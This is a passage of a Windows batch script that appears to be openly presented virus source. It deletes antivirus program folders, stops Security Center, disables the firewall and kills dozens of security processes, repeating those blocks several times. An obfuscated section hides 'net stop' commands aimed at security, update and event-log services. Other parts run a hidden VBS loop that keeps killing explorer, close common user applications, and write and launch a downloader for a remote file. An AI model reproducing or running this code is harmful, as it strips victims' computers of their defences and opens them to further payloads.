Files\avgcc\*.exe del /Q /F C:\Program Files\avgupsvc\*.exe del /Q /F C:\Program Files\grisoft del /Q /F C:\Program Files\nood32krn\*.exe del /Q /F C:\Program Files\nood32\*.exe cls del /Q /F C:\Program Files\nod32 del /Q /F C:\Program Files\nood32 del /Q /F C:\Program Files\kav\*.exe del /Q /F C:\Program Files\kavmm\*.exe del /Q /F C:\Program Files\kaspersky\*.* cls del /Q /F C:\Program Files\ewidoctrl\*.exe del /Q /F C:\Program Files\guard\*.exe del /Q /F C:\Program Files\ewido\*.exe cls del /Q /F C:\Program Files\pavprsrv\*.exe del /Q /F C:\Program Files\pavprot\*.exe del /Q /F C:\Program Files\avengine\*.exe cls del /Q /F C:\Program Files\apvxdwin\*.exe del /Q /F C:\Program Files\webproxy\*.exe del /Q /F C:\Program Files\panda software\*.* rem --------------------------------- rem --------------------------------- rem Temp Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE tskill /A cle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* cls tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost tskill /A isafe tskill /A zap* cls tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* cls tskill /A norton au* tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* cls tskill /A tmn* tskill /A pcc* tskill /A cpd* tskill /A pop* tskill /A pav* tskill /A padmin cls tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm* cls tskill /A sweep* tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* cls tskill /A offg* rem --------------------------------- rem --------------------------------- rem Temp Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE tskill /A cle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* cls tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost tskill /A isafe tskill /A zap* cls tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* cls tskill /A norton au* tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* cls tskill /A tmn* tskill /A pcc* tskill /A cpd* tskill /A pop* tskill /A pav* tskill /A padmin cls tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm* cls tskill /A sweep* tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* cls tskill /A offg* rem --------------------------------- rem --------------------------------- rem Temp Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE tskill /A cle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* cls tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost tskill /A isafe tskill /A zap* cls tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* cls tskill /A norton au* tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* cls tskill /A tmn* tskill /A pcc* tskill /A cpd* tskill /A pop* tskill /A pav* tskill /A padmin cls tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm* cls tskill /A sweep* tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* cls tskill /A offg* rem --------------------------------- rem --------------------------------- rem Encripted AV Killer del /F /Q %SystemDrive%\recycler\S-1-5-21-1202660629-261903793-725345543-1003\run.bat set ii=ne set ywe=st set ury=t set iej=op set jt53=Syma set o6t=nor set lyd2=fee set h3d=ton set gf45=ntec set own5=McA %ii%%ury% %ywe%%iej% "Security Center" /y %ii%%ury% %ywe%%iej% "Automatic Updates" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y %ii%%ury% %ywe%%iej% "SAVScan" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /y cls %ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y %ii%%ury% %ywe%%iej% navapsvc /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y %ii%%ury% %ywe%%iej% vrmonsvc /y %ii%%ury% %ywe%%iej% MonSvcNT /y %ii%%ury% %ywe%%iej% SAVScan /y %ii%%ury% %ywe%%iej% NProtectService /y %ii%%ury% %ywe%%iej% ccSetMGR /y %ii%%ury% %ywe%%iej% ccEvtMGR /y %ii%%ury% %ywe%%iej% srservice /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y %ii%%ury% %ywe%%iej% MskService /y %ii%%ury% %ywe%%iej% MpfService /y %ii%%ury% %ywe%%iej% mcupdmgr.exe /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y %ii%%ury% %ywe%%iej% helpsvc /y %ii%%ury% %ywe%%iej% ERSvc /y %ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y %ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y %ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /y cls %ii%%ury% %ywe%%iej% ccPwdSvc /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y %ii%%ury% %ywe%%iej% navapsvc /y %ii%%ury% %ywe%%iej% "Serv-U" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y %ii%%ury% %ywe%%iej% "NAV Alert" /y %ii%%ury% %ywe%%iej% "Nav Auto-Protect" /y cls %ii%%ury% %ywe%%iej% "McShield" /y %ii%%ury% %ywe%%iej% "DefWatch" /y %ii%%ury% %ywe%%iej% eventlog /y %ii%%ury% %ywe%%iej% InoRPC /y %ii%%ury% %ywe%%iej% InoRT /y %ii%%ury% %ywe%%iej% InoTask /y cls %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y %ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y %ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y %ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y %ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y %ii%%ury% %ywe%%iej% "SyGateService" /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y cls %ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y %ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus Job Server" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /y cls %ii%%ury% %ywe%%iej% netsvcs %ii%%ury% %ywe%%iej% spoolnt rem --------------------------------- rem --------------------------------- rem Kill Explorer echo :a >>explorer.bat echo tskill explorer >>explorer.bat echo goto a >>explorer.bat echo Set objShell = CreateObject("WScript.Shell")>>invisi.vbs echo strCommand = "explorer.bat">>invisi.vbs echo objShell.Run strCommand, vbHide, TRUE>>invisi.vbs start "" invisi.vbs rem --------------------------------- rem --------------------------------- rem Kill Microsoft Word tskill WINWORD rem --------------------------------- rem --------------------------------- rem Kill Microsoft Outlook tskill outlook rem --------------------------------- rem --------------------------------- rem Kill Microsoft Paint tskill mspaint rem --------------------------------- rem --------------------------------- rem Kill Notepad tskill notepad rem --------------------------------- rem --------------------------------- rem Kill Microsoft Excel tskill excel rem --------------------------------- rem --------------------------------- rem Kill Msn Messenger tskill msnmsgr rem --------------------------------- rem --------------------------------- rem Kill Internet Explorer tskill iexplore rem --------------------------------- rem --------------------------------- rem Kill Explorer echo :a >>explorer.bat echo tskill explorer >>explorer.bat echo goto a >>explorer.bat echo Set objShell = CreateObject("WScript.Shell")>>invisi.vbs echo strCommand = "explorer.bat">>invisi.vbs echo objShell.Run strCommand, vbHide, TRUE>>invisi.vbs start "" invisi.vbs rem --------------------------------- rem --------------------------------- rem Kill Safari tskill safari rem --------------------------------- rem --------------------------------- rem Kill Microsoft Access tskill msaccess rem --------------------------------- rem --------------------------------- rem Kill Calculator tskill calc rem --------------------------------- rem --------------------------------- rem Kill iTunes tskill iTunes rem --------------------------------- rem --------------------------------- rem Download File To Computer echo ' Set your settings >>%SystemDrive%\downloader.vbs echo strFileURL = "Download URL" >>%SystemDrive%\downloader.vbs echo strHDLocation = "Download To (Path\Name.Extension)" >>%SystemDrive%\downloader.vbs echo ' Fetch the file >>%SystemDrive%\downloader.vbs echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >>%SystemDrive%\downloader.vbs echo objXMLHTTP.open "GET", strFileURL, false >>%SystemDrive%\downloader.vbs echo objXMLHTTP.send() >>%SystemDrive%\downloader.vbs echo If objXMLHTTP.Status = 200 Then >>%SystemDrive%\downloader.vbs echo Set objADOStream = CreateObject("ADODB.Stream") >>%SystemDrive%\downloader.vbs echo objADOStream.Open >>%SystemDrive%\downloader.vbs echo objADOStream.Type = 1 'adTypeBinary >>%SystemDrive%\downloader.vbs echo objADOStream.Write objXMLHTTP.ResponseBody >>%SystemDrive%\downloader.vbs echo objADOStream.Position = 0 'Set the stream position to the start >>%SystemDrive%\downloader.vbs echo Set objFSO = Createobject("Scripting.FileSystemObject") >>%SystemDrive%\downloader.vbs echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >>%SystemDrive%\downloader.vbs echo Set objFSO = Nothing >>%SystemDrive%\downloader.vbs echo objADOStream.SaveToFile strHDLocation >>%SystemDrive%\downloader.vbs echo objADOStream.Close >>%SystemDrive%\downloader.vbs echo Set objADOStream = Nothing >>%SystemDrive%\downloader.vbs echo End if >>%SystemDrive%\downloader.vbs echo Set objXMLHTTP = Nothing >>%SystemDrive%\downloader.vbs start "" %SystemDrive%\downloader.vbs rem --------------------------------- rem __-Virus Author: -__